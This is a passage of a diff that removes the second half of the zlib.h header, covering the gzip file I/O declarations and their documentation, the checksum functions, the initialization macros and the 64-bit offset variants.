-ZEXTERN gzFile ZEXPORT gzdopen OF((int fd, const char *mode));
-/*
-     gzdopen associates a gzFile with the file descriptor fd.  File descriptors
-   are obtained from calls like open, dup, creat, pipe or fileno (if the file
-   has been previously opened with fopen).  The mode parameter is as in gzopen.
-
-     The next call of gzclose on the returned gzFile will also close the file
-   descriptor fd, just like fclose(fdopen(fd, mode)) closes the file descriptor
-   fd.  If you want to keep fd open, use fd = dup(fd_keep); gz = gzdopen(fd,
-   mode);.  The duplicated descriptor should be saved to avoid a leak, since
-   gzdopen does not close fd if it fails.  If you are using fileno() to get the
-   file descriptor from a FILE *, then you will have to use dup() to avoid
-   double-close()ing the file descriptor.  Both gzclose() and fclose() will
-   close the associated file descriptor, so they need to have different file
-   descriptors.
-
-     gzdopen returns NULL if there was insufficient memory to allocate the
-   gzFile state, if an invalid mode was specified (an 'r', 'w', or 'a' was not
-   provided, or '+' was provided), or if fd is -1.  The file descriptor is not
-   used until the next gz* read, write, seek, or close operation, so gzdopen
-   will not detect if fd is invalid (unless fd is -1).
-*/
-
-ZEXTERN int ZEXPORT gzbuffer OF((gzFile file, unsigned size));
-/*
-     Set the internal buffer size used by this library's functions.  The
-   default buffer size is 8192 bytes.  This function must be called after
-   gzopen() or gzdopen(), and before any other calls that read or write the
-   file.  The buffer memory allocation is always deferred to the first read or
-   write.  Three times that size in buffer space is allocated.  A larger buffer
-   size of, for example, 64K or 128K bytes will noticeably increase the speed
-   of decompression (reading).
-
-     The new buffer size also affects the maximum length for gzprintf().
-
-     gzbuffer() returns 0 on success, or -1 on failure, such as being called
-   too late.
-*/
-
-ZEXTERN int ZEXPORT gzsetparams OF((gzFile file, int level, int strategy));
-/*
-     Dynamically update the compression level or strategy.  See the description
-   of deflateInit2 for the meaning of these parameters.  Previously provided
-   data is flushed before the parameter change.
-
-     gzsetparams returns Z_OK if success, Z_STREAM_ERROR if the file was not
-   opened for writing, Z_ERRNO if there is an error writing the flushed data,
-   or Z_MEM_ERROR if there is a memory allocation error.
-*/
-
-ZEXTERN int ZEXPORT gzread OF((gzFile file, voidp buf, unsigned len));
-/*
-     Reads the given number of uncompressed bytes from the compressed file.  If
-   the input file is not in gzip format, gzread copies the given number of
-   bytes into the buffer directly from the file.
-
-     After reaching the end of a gzip stream in the input, gzread will continue
-   to read, looking for another gzip stream.  Any number of gzip streams may be
-   concatenated in the input file, and will all be decompressed by gzread().
-   If something other than a gzip stream is encountered after a gzip stream,
-   that remaining trailing garbage is ignored (and no error is returned).
-
-     gzread can be used to read a gzip file that is being concurrently written.
-   Upon reaching the end of the input, gzread will return with the available
-   data.  If the error code returned by gzerror is Z_OK or Z_BUF_ERROR, then
-   gzclearerr can be used to clear the end of file indicator in order to permit
-   gzread to be tried again.  Z_OK indicates that a gzip stream was completed
-   on the last gzread.  Z_BUF_ERROR indicates that the input file ended in the
-   middle of a gzip stream.  Note that gzread does not return -1 in the event
-   of an incomplete gzip stream.  This error is deferred until gzclose(), which
-   will return Z_BUF_ERROR if the last gzread ended in the middle of a gzip
-   stream.  Alternatively, gzerror can be used before gzclose to detect this
-   case.
-
-     gzread returns the number of uncompressed bytes actually read, less than
-   len for end of file, or -1 for error.  If len is too large to fit in an int,
-   then nothing is read, -1 is returned, and the error state is set to
-   Z_STREAM_ERROR.
-*/
-
-ZEXTERN z_size_t ZEXPORT gzfread OF((voidp buf, z_size_t size, z_size_t nitems,
-                                     gzFile file));
-/*
-     Read up to nitems items of size size from file to buf, otherwise operating
-   as gzread() does.  This duplicates the interface of stdio's fread(), with
-   size_t request and return types.  If the library defines size_t, then
-   z_size_t is identical to size_t.  If not, then z_size_t is an unsigned
-   integer type that can contain a pointer.
-
-     gzfread() returns the number of full items read of size size, or zero if
-   the end of the file was reached and a full item could not be read, or if
-   there was an error.  gzerror() must be consulted if zero is returned in
-   order to determine if there was an error.  If the multiplication of size and
-   nitems overflows, i.e. the product does not fit in a z_size_t, then nothing
-   is read, zero is returned, and the error state is set to Z_STREAM_ERROR.
-
-     In the event that the end of file is reached and only a partial item is
-   available at the end, i.e. the remaining uncompressed data length is not a
-   multiple of size, then the final partial item is nevetheless read into buf
-   and the end-of-file flag is set.  The length of the partial item read is not
-   provided, but could be inferred from the result of gztell().  This behavior
-   is the same as the behavior of fread() implementations in common libraries,
-   but it prevents the direct use of gzfread() to read a concurrently written
-   file, reseting and retrying on end-of-file, when size is not 1.
-*/
-
-ZEXTERN int ZEXPORT gzwrite OF((gzFile file,
-                                voidpc buf, unsigned len));
-/*
-     Writes the given number of uncompressed bytes into the compressed file.
-   gzwrite returns the number of uncompressed bytes written or 0 in case of
-   error.
-*/
-
-ZEXTERN z_size_t ZEXPORT gzfwrite OF((voidpc buf, z_size_t size,
-                                      z_size_t nitems, gzFile file));
-/*
-     gzfwrite() writes nitems items of size size from buf to file, duplicating
-   the interface of stdio's fwrite(), with size_t request and return types.  If
-   the library defines size_t, then z_size_t is identical to size_t.  If not,
-   then z_size_t is an unsigned integer type that can contain a pointer.
-
-     gzfwrite() returns the number of full items written of size size, or zero
-   if there was an error.  If the multiplication of size and nitems overflows,
-   i.e. the product does not fit in a z_size_t, then nothing is written, zero
-   is returned, and the error state is set to Z_STREAM_ERROR.
-*/
-
-ZEXTERN int ZEXPORTVA gzprintf Z_ARG((gzFile file, const char *format, ...));
-/*
-     Converts, formats, and writes the arguments to the compressed file under
-   control of the format string, as in fprintf.  gzprintf returns the number of
-   uncompressed bytes actually written, or a negative zlib error code in case
-   of error.  The number of uncompressed bytes written is limited to 8191, or
-   one less than the buffer size given to gzbuffer().  The caller should assure
-   that this limit is not exceeded.  If it is exceeded, then gzprintf() will
-   return an error (0) with nothing written.  In this case, there may also be a
-   buffer overflow with unpredictable consequences, which is possible only if
-   zlib was compiled with the insecure functions sprintf() or vsprintf()
-   because the secure snprintf() or vsnprintf() functions were not available.
-   This can be determined using zlibCompileFlags().
-*/
-
-ZEXTERN int ZEXPORT gzputs OF((gzFile file, const char *s));
-/*
-     Writes the given null-terminated string to the compressed file, excluding
-   the terminating null character.
-
-     gzputs returns the number of characters written, or -1 in case of error.
-*/
-
-ZEXTERN char * ZEXPORT gzgets OF((gzFile file, char *buf, int len));
-/*
-     Reads bytes from the compressed file until len-1 characters are read, or a
-   newline character is read and transferred to buf, or an end-of-file
-   condition is encountered.  If any characters are read or if len == 1, the
-   string is terminated with a null character.  If no characters are read due
-   to an end-of-file or len < 1, then the buffer is left untouched.
-
-     gzgets returns buf which is a null-terminated string, or it returns NULL
-   for end-of-file or in case of error.  If there was an error, the contents at
-   buf are indeterminate.
-*/
-
-ZEXTERN int ZEXPORT gzputc OF((gzFile file, int c));
-/*
-     Writes c, converted to an unsigned char, into the compressed file.  gzputc
-   returns the value that was written, or -1 in case of error.
-*/
-
-ZEXTERN int ZEXPORT gzgetc OF((gzFile file));
-/*
-     Reads one byte from the compressed file.  gzgetc returns this byte or -1
-   in case of end of file or error.  This is implemented as a macro for speed.
-   As such, it does not do all of the checking the other functions do.  I.e.
-   it does not check to see if file is NULL, nor whether the structure file
-   points to has been clobbered or not.
-*/
-
-ZEXTERN int ZEXPORT gzungetc OF((int c, gzFile file));
-/*
-     Push one character back onto the stream to be read as the first character
-   on the next read.  At least one character of push-back is allowed.
-   gzungetc() returns the character pushed, or -1 on failure.  gzungetc() will
-   fail if c is -1, and may fail if a character has been pushed but not read
-   yet.  If gzungetc is used immediately after gzopen or gzdopen, at least the
-   output buffer size of pushed characters is allowed.  (See gzbuffer above.)
-   The pushed character will be discarded if the stream is repositioned with
-   gzseek() or gzrewind().
-*/
-
-ZEXTERN int ZEXPORT gzflush OF((gzFile file, int flush));
-/*
-     Flushes all pending output into the compressed file.  The parameter flush
-   is as in the deflate() function.  The return value is the zlib error number
-   (see function gzerror below).  gzflush is only permitted when writing.
-
-     If the flush parameter is Z_FINISH, the remaining data is written and the
-   gzip stream is completed in the output.  If gzwrite() is called again, a new
-   gzip stream will be started in the output.  gzread() is able to read such
-   concatenated gzip streams.
-
-     gzflush should be called only when strictly necessary because it will
-   degrade compression if called too often.
-*/
-
-/*
-ZEXTERN z_off_t ZEXPORT gzseek OF((gzFile file,
-                                   z_off_t offset, int whence));
-
-     Sets the starting position for the next gzread or gzwrite on the given
-   compressed file.  The offset represents a number of bytes in the
-   uncompressed data stream.  The whence parameter is defined as in lseek(2);
-   the value SEEK_END is not supported.
-
-     If the file is opened for reading, this function is emulated but can be
-   extremely slow.  If the file is opened for writing, only forward seeks are
-   supported; gzseek then compresses a sequence of zeroes up to the new
-   starting position.
-
-     gzseek returns the resulting offset location as measured in bytes from
-   the beginning of the uncompressed stream, or -1 in case of error, in
-   particular if the file is opened for writing and the new starting position
-   would be before the current position.
-*/
-
-ZEXTERN int ZEXPORT    gzrewind OF((gzFile file));
-/*
-     Rewinds the given file. This function is supported only for reading.
-
-     gzrewind(file) is equivalent to (int)gzseek(file, 0L, SEEK_SET)
-*/
-
-/*
-ZEXTERN z_off_t ZEXPORT    gztell OF((gzFile file));
-
-     Returns the starting position for the next gzread or gzwrite on the given
-   compressed file.  This position represents a number of bytes in the
-   uncompressed data stream, and is zero when starting, even if appending or
-   reading a gzip stream from the middle of a file using gzdopen().
-
-     gztell(file) is equivalent to gzseek(file, 0L, SEEK_CUR)
-*/
-
-/*
-ZEXTERN z_off_t ZEXPORT gzoffset OF((gzFile file));
-
-     Returns the current offset in the file being read or written.  This offset
-   includes the count of bytes that precede the gzip stream, for example when
-   appending or when using gzdopen() for reading.  When reading, the offset
-   does not include as yet unused buffered input.  This information can be used
-   for a progress indicator.  On error, gzoffset() returns -1.
-*/
-
-ZEXTERN int ZEXPORT gzeof OF((gzFile file));
-/*
-     Returns true (1) if the end-of-file indicator has been set while reading,
-   false (0) otherwise.  Note that the end-of-file indicator is set only if the
-   read tried to go past the end of the input, but came up short.  Therefore,
-   just like feof(), gzeof() may return false even if there is no more data to
-   read, in the event that the last read request was for the exact number of
-   bytes remaining in the input file.  This will happen if the input file size
-   is an exact multiple of the buffer size.
-
-     If gzeof() returns true, then the read functions will return no more data,
-   unless the end-of-file indicator is reset by gzclearerr() and the input file
-   has grown since the previous end of file was detected.
-*/
-
-ZEXTERN int ZEXPORT gzdirect OF((gzFile file));
-/*
-     Returns true (1) if file is being copied directly while reading, or false
-   (0) if file is a gzip stream being decompressed.
-
-     If the input file is empty, gzdirect() will return true, since the input
-   does not contain a gzip stream.
-
-     If gzdirect() is used immediately after gzopen() or gzdopen() it will
-   cause buffers to be allocated to allow reading the file to determine if it
-   is a gzip file.  Therefore if gzbuffer() is used, it should be called before
-   gzdirect().
-
-     When writing, gzdirect() returns true (1) if transparent writing was
-   requested ("wT" for the gzopen() mode), or false (0) otherwise.  (Note:
-   gzdirect() is not needed when writing.  Transparent writing must be
-   explicitly requested, so the application already knows the answer.  When
-   linking statically, using gzdirect() will include all of the zlib code for
-   gzip file reading and decompression, which may not be desired.)
-*/
-
-ZEXTERN int ZEXPORT    gzclose OF((gzFile file));
-/*
-     Flushes all pending output if necessary, closes the compressed file and
-   deallocates the (de)compression state.  Note that once file is closed, you
-   cannot call gzerror with file, since its structures have been deallocated.
-   gzclose must not be called more than once on the same file, just as free
-   must not be called more than once on the same allocation.
-
-     gzclose will return Z_STREAM_ERROR if file is not valid, Z_ERRNO on a
-   file operation error, Z_MEM_ERROR if out of memory, Z_BUF_ERROR if the
-   last read ended in the middle of a gzip stream, or Z_OK on success.
-*/
-
-ZEXTERN int ZEXPORT gzclose_r OF((gzFile file));
-ZEXTERN int ZEXPORT gzclose_w OF((gzFile file));
-/*
-     Same as gzclose(), but gzclose_r() is only for use when reading, and
-   gzclose_w() is only for use when writing or appending.  The advantage to
-   using these instead of gzclose() is that they avoid linking in zlib
-   compression or decompression code that is not used when only reading or only
-   writing respectively.  If gzclose() is used, then both compression and
-   decompression code will be included the application when linking to a static
-   zlib library.
-*/
-
-ZEXTERN const char * ZEXPORT gzerror OF((gzFile file, int *errnum));
-/*
-     Returns the error message for the last error which occurred on the given
-   compressed file.  errnum is set to zlib error number.  If an error occurred
-   in the file system and not in the compression library, errnum is set to
-   Z_ERRNO and the application may consult errno to get the exact error code.
-
-     The application must not modify the returned string.  Future calls to
-   this function may invalidate the previously returned string.  If file is
-   closed, then the string previously returned by gzerror will no longer be
-   available.
-
-     gzerror() should be used to distinguish errors from end-of-file for those
-   functions above that do not distinguish those cases in their return values.
-*/
-
-ZEXTERN void ZEXPORT gzclearerr OF((gzFile file));
-/*
-     Clears the error and end-of-file flags for file.  This is analogous to the
-   clearerr() function in stdio.  This is useful for continuing to read a gzip
-   file that is being written concurrently.
-*/
-
-#endif /* !Z_SOLO */
-
-                        /* checksum functions */
-
-/*
-     These functions are not related to compression but are exported
-   anyway because they might be useful in applications using the compression
-   library.
-*/
-
-ZEXTERN uLong ZEXPORT adler32 OF((uLong adler, const Bytef *buf, uInt len));
-/*
-     Update a running Adler-32 checksum with the bytes buf[0..len-1] and
-   return the updated checksum.  If buf is Z_NULL, this function returns the
-   required initial value for the checksum.
-
-     An Adler-32 checksum is almost as reliable as a CRC-32 but can be computed
-   much faster.
-
-   Usage example:
-
-     uLong adler = adler32(0L, Z_NULL, 0);
-
-     while (read_buffer(buffer, length) != EOF) {
-       adler = adler32(adler, buffer, length);
-     }
-     if (adler != original_adler) error();
-*/
-
-ZEXTERN uLong ZEXPORT adler32_z OF((uLong adler, const Bytef *buf,
-                                    z_size_t len));
-/*
-     Same as adler32(), but with a size_t length.
-*/
-
-/*
-ZEXTERN uLong ZEXPORT adler32_combine OF((uLong adler1, uLong adler2,
-                                          z_off_t len2));
-
-     Combine two Adler-32 checksums into one.  For two sequences of bytes, seq1
-   and seq2 with lengths len1 and len2, Adler-32 checksums were calculated for
-   each, adler1 and adler2.  adler32_combine() returns the Adler-32 checksum of
-   seq1 and seq2 concatenated, requiring only adler1, adler2, and len2.  Note
-   that the z_off_t type (like off_t) is a signed integer.  If len2 is
-   negative, the result has no meaning or utility.
-*/
-
-ZEXTERN uLong ZEXPORT crc32   OF((uLong crc, const Bytef *buf, uInt len));
-/*
-     Update a running CRC-32 with the bytes buf[0..len-1] and return the
-   updated CRC-32.  If buf is Z_NULL, this function returns the required
-   initial value for the crc.  Pre- and post-conditioning (one's complement) is
-   performed within this function so it shouldn't be done by the application.
-
-   Usage example:
-
-     uLong crc = crc32(0L, Z_NULL, 0);
-
-     while (read_buffer(buffer, length) != EOF) {
-       crc = crc32(crc, buffer, length);
-     }
-     if (crc != original_crc) error();
-*/
-
-ZEXTERN uLong ZEXPORT crc32_z OF((uLong adler, const Bytef *buf,
-                                  z_size_t len));
-/*
-     Same as crc32(), but with a size_t length.
-*/
-
-/*
-ZEXTERN uLong ZEXPORT crc32_combine OF((uLong crc1, uLong crc2, z_off_t len2));
-
-     Combine two CRC-32 check values into one.  For two sequences of bytes,
-   seq1 and seq2 with lengths len1 and len2, CRC-32 check values were
-   calculated for each, crc1 and crc2.  crc32_combine() returns the CRC-32
-   check value of seq1 and seq2 concatenated, requiring only crc1, crc2, and
-   len2.
-*/
-
-
-                        /* various hacks, don't look :) */
-
-/* deflateInit and inflateInit are macros to allow checking the zlib version
- * and the compiler's view of z_stream:
- */
-ZEXTERN int ZEXPORT deflateInit_ OF((z_streamp strm, int level,
-                                     const char *version, int stream_size));
-ZEXTERN int ZEXPORT inflateInit_ OF((z_streamp strm,
-                                     const char *version, int stream_size));
-ZEXTERN int ZEXPORT deflateInit2_ OF((z_streamp strm, int  level, int  method,
-                                      int windowBits, int memLevel,
-                                      int strategy, const char *version,
-                                      int stream_size));
-ZEXTERN int ZEXPORT inflateInit2_ OF((z_streamp strm, int  windowBits,
-                                      const char *version, int stream_size));
-ZEXTERN int ZEXPORT inflateBackInit_ OF((z_streamp strm, int windowBits,
-                                         unsigned char FAR *window,
-                                         const char *version,
-                                         int stream_size));
-#ifdef Z_PREFIX_SET
-#  define z_deflateInit(strm, level) \
-          deflateInit_((strm), (level), ZLIB_VERSION, (int)sizeof(z_stream))
-#  define z_inflateInit(strm) \
-          inflateInit_((strm), ZLIB_VERSION, (int)sizeof(z_stream))
-#  define z_deflateInit2(strm, level, method, windowBits, memLevel, strategy) \
-          deflateInit2_((strm),(level),(method),(windowBits),(memLevel),\
-                        (strategy), ZLIB_VERSION, (int)sizeof(z_stream))
-#  define z_inflateInit2(strm, windowBits) \
-          inflateInit2_((strm), (windowBits), ZLIB_VERSION, \
-                        (int)sizeof(z_stream))
-#  define z_inflateBackInit(strm, windowBits, window) \
-          inflateBackInit_((strm), (windowBits), (window), \
-                           ZLIB_VERSION, (int)sizeof(z_stream))
-#else
-#  define deflateInit(strm, level) \
-          deflateInit_((strm), (level), ZLIB_VERSION, (int)sizeof(z_stream))
-#  define inflateInit(strm) \
-          inflateInit_((strm), ZLIB_VERSION, (int)sizeof(z_stream))
-#  define deflateInit2(strm, level, method, windowBits, memLevel, strategy) \
-          deflateInit2_((strm),(level),(method),(windowBits),(memLevel),\
-                        (strategy), ZLIB_VERSION, (int)sizeof(z_stream))
-#  define inflateInit2(strm, windowBits) \
-          inflateInit2_((strm), (windowBits), ZLIB_VERSION, \
-                        (int)sizeof(z_stream))
-#  define inflateBackInit(strm, windowBits, window) \
-          inflateBackInit_((strm), (windowBits), (window), \
-                           ZLIB_VERSION, (int)sizeof(z_stream))
-#endif
-
-#ifndef Z_SOLO
-
-/* gzgetc() macro and its supporting function and exposed data structure.  Note
- * that the real internal state is much larger than the exposed structure.
- * This abbreviated structure exposes just enough for the gzgetc() macro.  The
- * user should not mess with these exposed elements, since their names or
- * behavior could change in the future, perhaps even capriciously.  They can
- * only be used by the gzgetc() macro.  You have been warned.
- */
-struct gzFile_s {
-    unsigned have;
-    unsigned char *next;
-    z_off64_t pos;
-};
-ZEXTERN int ZEXPORT gzgetc_ OF((gzFile file));  /* backward compatibility */
-#ifdef Z_PREFIX_SET
-#  undef z_gzgetc
-#  define z_gzgetc(g) \
-          ((g)->have ? ((g)->have--, (g)->pos++, *((g)->next)++) : (gzgetc)(g))
-#else
-#  define gzgetc(g) \
-          ((g)->have ? ((g)->have--, (g)->pos++, *((g)->next)++) : (gzgetc)(g))
-#endif
-
-/* provide 64-bit offset functions if _LARGEFILE64_SOURCE defined, and/or
- * change the regular functions to 64 bits if _FILE_OFFSET_BITS is 64 (if
- * both are true, the application gets the *64 functions, and the regular
- * functions are changed to 64 bits) -- in case these are set on systems
- * without large file support, _LFS64_LARGEFILE must also be true
- */
-#ifdef Z_LARGE64
-   ZEXTERN gzFile ZEXPORT gzopen64 OF((const char *, const char *));
-   ZEXTERN z_off64_t ZEXPORT gzseek64 OF((gzFile, z_off64_t, int));
-   ZEXTERN z_off64_t ZEXPORT gztell64 OF((gzFile));
-   ZEXTERN z_off64_t ZEXPORT gzoffset64 OF((gzFile));
-   ZEXTERN uLong ZEXPORT adler32_combine64 OF((uLong, uLong, z_off64_t));
-   ZEXTERN uLong ZEXPORT crc32_combine64 OF((uLong, uLong, z_off64_t));
-#endif
-
-#if !defined(ZLIB_INTERNAL) && defined(Z_WANT64)
-#  ifdef Z_PREFIX_SET
-#    define z_gzopen z_gzopen64
-#    define z_gzseek z_gzseek64
-#    define z_gztell z_gztell64
-#    define z_gzoffset z_gzoffset64
-#    define z_adler32_combine z_adler32_combine64
-#    define z_crc32_combine z_crc32_combine64
-#  else
-#    define gzopen gzopen64
-#    define gzseek gzseek64
-#    define gztell gztell64
-#    define gzoffset gzoffset64
-#    define adler32_combine adler32_combine64
-#    define crc32_combine crc32_combine64
-#  endif
-#  ifndef Z_LARGE64
-     ZEXTERN gzFile ZEXPORT gzopen64 OF((const char *, const char *));
-     ZEXTERN z_off_t ZEXPORT gzseek64 OF((gzFile, z_off_t, int));
-     ZEXTERN z_off_t ZEXPORT gztell64 OF((gzFile));
-     ZEXTERN z_off_t ZEXPORT gzoffset64 OF((gzFile));
-     ZEXTERN uLong ZEXPORT adler32_combine64 OF((uLong, uLong, z_off_t));
-     ZEXTERN uLong ZEXPORT crc32_combine64 OF((uLong, uLong, z_off_t));
-#  endif
-#else
-   ZEXTERN gzFile ZEXPORT gzopen OF((const char *, const char *));
-   ZEXTERN z_off_t ZEXPORT gzseek OF((gzFile, z_off_t, int));
-   ZEXTERN z_off_t ZEXPORT gztell OF((gzFile));
-   ZEXTERN z_off_t ZEXPORT gzoffset OF((gzFile));
-   ZEXTERN uLong ZEXPORT adler32_combine OF((uLong, uLong, z_off_t));
-   ZEXTERN uLong ZEXPORT crc32_combine OF((uLong, uLong, z_off_t));
-#endif
-
-#else /* Z_SOLO */
-
-   ZEXTERN uLong ZEXPORT adler32_combine OF((uLong, uLong, z_off_t));
-   ZEXTERN uLong ZEXPORT crc32_combine OF((uLong, uLong, z_off_t));
-
-#endif /* !Z_SOLO */
-
-/* undocumented functions */
-ZEXTERN const char   * ZEXPORT zError           OF((int));
-ZEXTERN int            ZEXPORT inflateSyncPoint OF((z_streamp));
-ZEXTERN const z_crc_t FAR * ZEXPORT get_crc_table    OF((void));
-ZEXTERN int            ZEXPORT inflateUndermine OF((z_streamp, int));
-ZEXTERN int            ZEXPORT inflateValidate OF((z_streamp, int));
-ZEXTERN unsigned long  ZEXPORT inflateCodesUsed OF ((z_streamp));
-ZEXTERN int            ZEXPORT inflateResetKeep OF((z_streamp));
-ZEXTERN int            ZEXPORT deflateResetKeep OF((z_streamp));
-#if (defined(_WIN32) || defined(__CYGWIN__)) && !defined(Z_SOLO)
-ZEXTERN gzFile         ZEXPORT gzopen_w OF((const wchar_t *path,
-                                            const char *mode));
-#endif
-#if defined(STDC) || defined(Z_HAVE_STDARG_H)
-#  ifndef Z_SOLO
-ZEXTERN int            ZEXPORTVA gzvprintf Z_ARG((gzFile file,
-                                                  const char *format,
-                                                  va_list va));
-#  endif
-#endif
-
-#ifdef __cplusplus
-}
-#endif
-
-#endif /* ZLIB_H */